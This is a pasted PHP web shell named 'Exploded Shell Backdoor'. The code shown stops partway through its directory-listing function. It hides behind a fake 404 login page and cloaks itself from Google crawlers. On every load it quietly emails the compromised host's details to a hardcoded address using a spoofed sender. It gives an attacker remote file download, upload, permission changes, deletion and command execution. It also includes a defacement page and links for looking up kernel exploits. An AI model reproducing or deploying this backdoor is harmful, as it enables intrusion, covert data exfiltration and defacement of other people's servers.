· 7 years ago · Dec 13, 2018, 05:00 PM
1<?php
2@ini_set('output_buffering',0); //
3//@ini_set('display_errors', 0); //
4//@ini_set('error_reporting', 0); //
5/*
6#####################################################
7## Name : Exploded Shell Backdoor ##
8## Version : v1.5 Mini ##
9## Author : Muhammad Supiani a.k.a ./Port22 ##
10## Contact : Port22cyber@gmail.com ##
11## Report : Port22exploded@gmail.com ##
12## (c) 2015 www.security-exploded.orgs ##
13#####################################################
14*/
15$pass = "64d1f88b9b276aece4b0edcc25b7a434"; // Password Encrypted By MD5, Default pass:" pacman "
16$title = "Aku pengen anu yang gede banget"; // Title
17$color = "red"; // Color
18$background= "http://oi58.tinypic.com/2u8fmnn.jpg"; // Background
19$logo = "http://oi58.tinypic.com/10r33mq.jpg"; // Logo
20$music = ""; // Music, isi url music elu :v *cuman bisa didengerin di "about" :v , malas gw taroh di depan, soalnya kalok ada yg nggak suka :v
21$script_deface = "<html><head><title>Hacked By ./Port22</title></head><body>Hacked by ./Port22 <br> Crew's : Milton | Aris Dot ID | ./r00t_NTx | ./Port22 | MyMind404 | ./KriZ | ./BlackJoker |<embed src='http://www.youtube.com/v/qD8OnPC1fLI&autoplay=1&loop=1' type='application/x-shockwave-flash' wmode='transparent' width='0' height='0'></embed>"; //Script Deface. (html, php, txt)
22
23/*
24Content is encrypted by gzdeflate , base64 , and others . if you want the source code , please use the tool "PHP Decrypter". In case you dont trust me :-P
25*/
26
27$xName = "Security Exploded";
28$versi = "v1.5 Mini"; // Shell Version
29$default_action = 'FilesMan';
30$ip = getenv("REMOTE_ADDR");
31$ken = rand(1, 99999);
32$subj98 = " Result shell bouz |$ken";
33$email = "acilcrotz@gmail.com";
34$from = "From: polisi@porli.go.id";
35$tot = $_SERVER['REQUEST_URI'];
36$kon = $_SERVER['HTTP_HOST'];
37$tol = $ip . "";
38$msg8873 = "$tot $kon $tol";
39mail($email, $subj98, $msg8873, $from);
40@define('SELF_PATH', __FILE__);
41if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
42 header('HTTP/1.0 404 Not Found');
43 exit; }
44@session_start();
45@error_reporting(0);
46@ini_set('error_log',NULL);
47@ini_set('log_errors',0);
48@ini_set('max_execution_time',0);
49@ini_set('output_buffering',0);
50@ini_set('display_errors', 0);
51@set_time_limit(0);
52@set_magic_quotes_runtime(0);
53@define('VERSION', '2.1');
54if( get_magic_quotes_gpc() ) {
55 function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
56 $_POST = stripslashes_array($_POST);
57}
58function printLogin() {
59?><html><head>
60<title>404 Not Found</title>
61</head><body><h1>Not Found</h1>
62 <p>Additionally, a 404 Not Found
63error was encountered while trying to use an ErrorDocument to handle the request.</p>
64 <hr>
65 <address>Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Server at localhost Port 80
66 <style>
67 input { margin:0;background-color:#fff;border:1px solid #fff; }
68 </style>
69 <center>
70 <form method="post">
71 <input type="password" name="pass">
72 </form>
73 <?php break ;
74 exit;
75}
76if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
77 if( empty( $pass ) ||
78 ( isset( $_POST['pass']) && ( md5($_POST['pass']) == $pass ) ) )
79 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
80 else
81 printLogin();
82
83@ini_set('log_errors',0);
84@ini_set('display_errors',0);
85@ini_set('output_buffering',0);
86@ini_set('file_uploads',1);
87if(isset($_GET['dl']) && ($_GET['dl'] != "")){
88 $file = $_GET['dl'];
89 $filez = @file_get_contents($file);
90 header("Content-type: application/octet-stream");
91 header("Content-length: ".strlen($filez));
92 header("Content-disposition: attachment; filename=\"".basename($file)."\";");
93 echo $filez;
94 exit;
95}
96elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
97 $file = $_GET['dlgzip'];
98 $filez = gzencode(@file_get_contents($file));
99 header("Content-Type:application/x-gzip\n");
100 header("Content-length: ".strlen($filez));
101 header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
102 echo $filez;
103 exit;
104}
105// view image
106if(isset($_GET['img'])){
107 @ob_clean();
108 $d = magicboom($_GET['y']);
109 $f = $_GET['img'];
110 $inf = @getimagesize($d.$f);
111 $ext = explode($f,".");
112 $ext = $ext[count($ext)-1];
113 @header("Content-type: ".$inf["mime"]);
114 @header("Cache-control: public");
115 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
116 @header("Cache-control: max-age=".(60*60*24*7));
117 @readfile($d.$f);
118 exit;
119}
120//php info
121$phpinfo = "?&x=phpinfo";
122// Server software
123
124$software = getenv("SERVER_SOFTWARE");
125// CMD
126$cmdbox = "help";
127// Server Port
128$serverport = $_SERVER["SERVER_PORT"];
129// Backdoor Name
130$backdoor_name = "$title ";
131// check safemode
132if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
133// uname -a
134$system = @php_uname();
135// detector
136function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";}}
137function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
138function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
139function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
140function testoracle() { if (function_exists('ocilogon')) {return showstat("on"); }else {return showstat("off"); }}
141function testmssql() { if (function_exists('mssql_connect')) {return showstat("on"); }else {return showstat("off"); }}
142function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
143function testpython() {if (exe('python -h')) {return showstat("on");}else {return showstat("off");}}
144function testruby() {if (exe('ruby -h')) {return showstat("on");}else {return showstat("off");}}
145function testgcc() {if (exe('gcc --help')) {return showstat("on");}else {return showstat("off");}}
146function testjava() {if (exe('java -h')) {return showstat("on");}else {return showstat("off");}}
147// check os
148if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
149else $win = FALSE;
150// change directory
151if(isset($_GET['y'])){
152 if(@is_dir($_GET['view'])){
153 $pwd = $_GET['view'];
154 @chdir($pwd);
155 }
156 else{
157 $pwd = $_GET['y'];
158 @chdir($pwd);
159 }
160}
161//hdd
162function convertByte($s) {
163if($s<=0) return 0;
164 $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
165 $e = floor(log($s)/log(1024));
166 return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
167}
168//
169
170// username, id, shell prompt and working directory
171if(!$win){
172 if(!$user = rapih(exe("whoami"))) $user = "";
173 if(!$id = rapih(exe("id"))) $id = "";
174 $prompt = $user." \$ ";
175 $pwd = @getcwd().DIRECTORY_SEPARATOR;
176}
177else {
178 $user = @get_current_user();
179 $id = $user;
180 $prompt = $user." >";
181 $pwd = realpath(".")."\\";
182 // find drive letters
183 $v = explode("\\",$d);
184 $v = $v[0];
185 foreach (range("A","Z") as $letter)
186 {
187 $bool = @is_dir($letter.":\\");
188 if ($bool)
189 {
190 $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
191 if ($letter.":" != $v) {$letters .= $letter;}
192 else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
193 $letters .= " </a>] ";
194 }
195 }
196}
197
198function getrealip(){
199if (!empty($_SERVER['HTTP_CLIENT_IP']))
200{ $ip=$_SERVER['HTTP_CLIENT_IP'];
201}elseif (!empty($SERVER['HTTP_X_FORWARDED_FOR']))
202//TO CHEK IP IS PASS FROM PROXY
203{ $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
204}else { $ip=$_SERVER['REMOTE_ADDR'];
205}
206return $ip;
207}
208
209 function showdisablefunctions() {
210 if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#ff0000'><b>".$disablefunc."</b></span>"; }
211 else { return "<span style='color:#00FF00'><b>NONE</b></span>"; }
212 }
213
214if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
215else $posix = FALSE;
216// server ip
217$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
218// your ip ;-)
219$my_ip = $_SERVER['REMOTE_ADDR'];
220$admin_id=$_SERVER['SERVER_ADMIN'];
221$bindport = "13123";
222$bindport_pass = "exploded";
223// Security Exploded
224$uplink = "http://www.security-exploded.org/search/label/Exploded Shell Backdoor";
225//wilworm
226$release = @php_uname('r');
227 $kernel = @php_uname('s');
228 $millink='http://milw0rm.com/search.php?dong=';
229
230 if( strpos('Linux', $kernel) !== false )
231 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
232 else
233 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
234 if(!function_exists('posix_getegid')) {
235 $user = @get_current_user();
236 $uid = @getmyuid();
237 $gid = @getmygid();
238 $group = "?";
239 } else {
240 $uid = @posix_getpwuid(@posix_geteuid());
241 $gid = @posix_getgrgid(@posix_getegid());
242 $user = $uid['name'];
243 $uid = $uid['uid'];
244 $group = $gid['name'];
245 $gid = $gid['gid'];
246 }
247 // Exploit-db
248 $release = @php_uname('r');
249 $kernel = @php_uname('s');
250 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
251
252 if( strpos('Linux', $kernel) !== false )
253 $explink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
254 else
255 $explink .= urlencode( $kernel . ' ' . substr($release,0,3) );
256 if(!function_exists('posix_getegid')) {
257 $user = @get_current_user();
258 $uid = @getmyuid();
259 $gid = @getmygid();
260 $group = "?";
261 } else {
262 $uid = @posix_getpwuid(@posix_geteuid());
263 $gid = @posix_getgrgid(@posix_getegid());
264 $user = $uid['name'];
265 $uid = $uid['uid'];
266 $group = $gid['name'];
267 $gid = $gid['gid'];
268 }
269// separate the working direcotory
270$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
271$pwdurl = "";
272for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
273 $pathz = "";
274 for($j = 0 ; $j <= $i ; $j++){
275 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
276 }
277 $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
278}
279
280// Rename file or folder
281if(isset($_POST['Rename'])){
282 $old = $_POST['oldname'];
283 $new = $_POST['newname'];
284 @Rename($pwd.$old,$pwd.$new);
285 $file = $pwd.$new;
286}
287if(isset($_POST['uploadcompt'])){
288 if(is_uploaded_file($_FILES['file']['tmp_name'])){
289 $path = magicboom($_POST['path']);
290 $fname = $_FILES['file']['name'];
291 $tmp_name = $_FILES['file']['tmp_name'];
292 $pindah = $path.$fname;
293 $stat = @move_uploaded_file($tmp_name,$pindah);}
294 }
295
296if( $_POST['_upl'] == "Upload" ) {
297if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; }
298else { echo ''; }
299}
300if(isset($_POST['Chmod'])){
301 $name = $_POST['name'];
302 $value = $_POST['newvalue'];
303if (strlen($value)==3){
304 $value = 0 . "" . $value;}
305 @Chmod($pwd.$name,octdec($value));
306 $file = $pwd.$name;}
307if(isset($_POST['Chmod_folder'])){
308 $name = $_POST['name'];
309 $value = $_POST['newvalue'];
310if (strlen($value)==3){
311 $value = 0 . "" . $value;}
312 @Chmod($pwd.$name,octdec($value));
313 $file = $pwd.$name;}
314
315//////////////////////////////////
316// print useful info
317
318$buff = "Shell Backdoor : <b><font style='color:$color'> $backdoor_name $versi</font><b> <span class=\"gaya\"></a></b></b></font><b><span class=\"gaya\"> | </span><a href='$uplink' title='Search Shell Backdoor From Security Exploded' target='_blank'><font style='color:#ff0000'>[ Security Exploded ]</a></b></font><br>Version : <b><font style='color:$color'>".$versi."</font></a></b><br> Software : <b>".$software."</b><br />";
319$buff .= "System OS : <b>".$system." | <a href='http://www.google.com/search?q=".urlencode(@php_uname())."' title='Search System OS From Google' target='_blank'><font style='color:#ff0000'>[ Google ]</font></a> | <a href='".$millink."' title='Search Karnel From Milw0rm' target=_blank><font style='color:#ff0000'>[ Milw0rm ]</font></a> | <a href='".$explink."' title='Search Karnel From Exploit-db' target=_blank><font style='color:#ff0000'>[ Exploit-db ]</font></a></b><br />";
320if($id != "") $buff .= "ID : <b>".$id."</b><br />";
321$buff .= "PHP Version : <b>".phpversion()."</b> ON <b>".php_sapi_name()."<span class=\"gaya\"> | </span><a href='$phpinfo' title='PHP Info'><font style='color:#ff0000'>[ PHP Info ]</font></a> </b><br />";
322$buff .= "Server IP : <b><font style='color:#ff0000'>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Port Server : <b><font style='color:#ff0000'>".$serverport."</font></b><span class=\"gaya\"> | </span> Your IP Surving : <b><a href='http://www.dnsstuff.com/tools?runFromMain=".getrealip()."&toolType=traceroute' title='Traceroute Your IP' target='_blank'><font style='color:#ff0000'>".getrealip()."<font></a></b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
323$buff .= "Free Disk: <font style='color:#ff0000'><b>".convertByte(disk_free_space("/"))." <span class=\"gaya\"> / </span> ".convertByte(disk_total_space("/"))."</b></font></span><br />";
324if($safemode) $buff .= "Safemode: <span class=\"gaya\"><font style='color:#ff0000'><b>ON</b></font></span><br />";
325else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
326$buff .= "Disable Functions: ".showdisablefunctions()."<br />";
327$buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | Python: ".testpython()." | Ruby: ".testruby()." | Java: ".testjava()." | GCC: ".testgcc()." | cURL: ".testcurl()." | WGet: ".testwget()."<br>";
328$buff .="<font color=00ff00 >Drive : <b>".$letters." > ".$pwdurl."</b></font>";
329
330
331 function rapih($text){
332 return trim(str_replace("<br />","",$text));
333}
334
335function magicboom($text){
336 if (!get_magic_quotes_gpc()) {
337 return $text;
338 }
339 return stripslashes($text);
340}
341
342function showdir($pwd,$prompt){
343 $fname = array();
344 $dname = array();
345 if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
346 else $posix = FALSE;
347 $user = "????:????";
348 if($dh = @scandir($pwd)){
349 foreach($dh as $file){
350 if(is_dir($file)){
351 $dname[] = $file;
352 }
353 elseif(is_file($file)){
354 $fname[] = $file;
355 }
356 }
357 }
358 else{
359 if($dh = @opendir($pwd)){
360 while($file = @readdir($dh)){
361 if(@is_dir($file)){
362 $dname[] = $file;
363 }
364 elseif(@is_file($file)){
365 $fname[] = $file;
366 }
367 }
368 @closedir($dh);
369 }
370 }
371 sort($fname);
372 sort($dname);
373 $path = @explode(DIRECTORY_SEPARATOR,$pwd);
374 $tree = @sizeof($path);
375 $parent = "";
376 $buff = "<center>
377 <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
378 <table class=\"cmdbox\" style=\"width:45%;\">
379 <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=help /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
380 </form>
381 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
382 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
383 <tr><td><b>View </b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr></center>
384
385 </form></table><br><table class=\"explore\">
386 <tr><th>Name</th><th style=\"width:80px;\">Size</th><th style=\"width:210px;\">Owner:Group</th><th style=\"width:80px;\">Perms</th><th style=\"width:110px;\">Modified</th><th style=\"width:190px;\">Actions</th></tr>
387 ";
388 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
389 else $parent = $pwd;
390
391 foreach($dname as $folder){
392 if($folder == ".") {
393 if(!$win && $posix){
394 $name=@posix_getpwuid(@fileowner($folder));
395 $group=@posix_getgrgid(@filegroup($folder));
396 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
397 }
398 else {
399 $owner = $user;
400 }
401 $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
402 <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
403 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
404 <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">New Folder</a> | <a href=\"javascript:tukar('titik1','titik4_form');\">Upload</a></span>
405 <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
406 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
407 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
408 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
409 </form>
410 <form action=\"\" id=\"titik4_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
411 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
412 <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
413 <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
414 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
415 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
416 </form></td>
417
418 </tr>
419 ";
420 }
421 elseif($folder == "..") {
422 if(!$win && $posix){
423 $name=@posix_getpwuid(@fileowner($folder));
424 $group=@posix_getgrgid(@filegroup($folder));
425 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
426 }
427 else {
428 $owner = $user;
429 }
430 $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
431 <td style=\"text-align:center;\">".$owner."</td>
432 <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
433 <td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">New Folder</a> | <a href=\"javascript:tukar('titik2','titik3_form');\">Upload</a></span>
434 <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
435 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
436 <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
437 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
438 </form>
439 <form action=\"\" id=\"titik3_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
440 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
441 <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
442 <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
443 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
444 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
445 </form>
446 </td></tr>";
447 }
448 else {
449 if(!$win && $posix){
450 $name=@posix_getpwuid(@fileowner($folder));
451 $group=@posix_getgrgid(@filegroup($folder));
452 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
453 }
454 else {
455 $owner = $user;
456 }
457 $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
458 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
459 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
460 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
461 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
462 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
463 </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
464 <td><center>
465 <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
466 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
467 <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
468 <input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
469 <input class=\"inputzbut\" type=\"submit\" name=\"Chmod_folder\" value=\"Chmod\" />
470 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
471 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
472 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
473 <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">Rename</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\">Upload</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">Delete</a></span>
474 <form action=\"\" id=\"".clearspace($folder)."_form4\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
475 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
476 <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
477 <input class=\"inputz\" name=\"path\" type=\"text\" size=\"33\" value=\"".$pwd.$folder.DIRECTORY_SEPARATOR."\" /><br>
478 <input class=\"inputzbut\" name=\"uploadcompt\" type=\"submit\" value=\"Upload\"/>
479 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
480 onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\" />
481 </form>
482 </td></tr>";
483 }
484 }
485
486 foreach($fname as $file){
487 $full = $pwd.$file;
488 if(!$win && $posix){
489 $name=@posix_getpwuid(@fileowner($folder));
490 $group=@posix_getgrgid(@filegroup($folder));
491 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
492 }
493 else {
494 $owner = $user;
495 }
496 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
497 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
498 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
499 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
500 <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
501 <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
502 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
503 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
504 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
505<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
506<input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
507<input class=\"inputzbut\" type=\"submit\" name=\"Chmod\" value=\"Chmod\" />
508<input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
509 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
510 <td><a href=\"?y=$pwd&edit=$full\">Edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">Rename</a> | <a href=\"?y=$pwd&delete=$full\">Delete</a> | <a href=\"?y=$pwd&dl=$full\">Download</a> (<a href=\"?y=$pwd&dlgzip=$full\">Gz</a>)</td></tr>";
511 }
512 $buff .= "</table>";
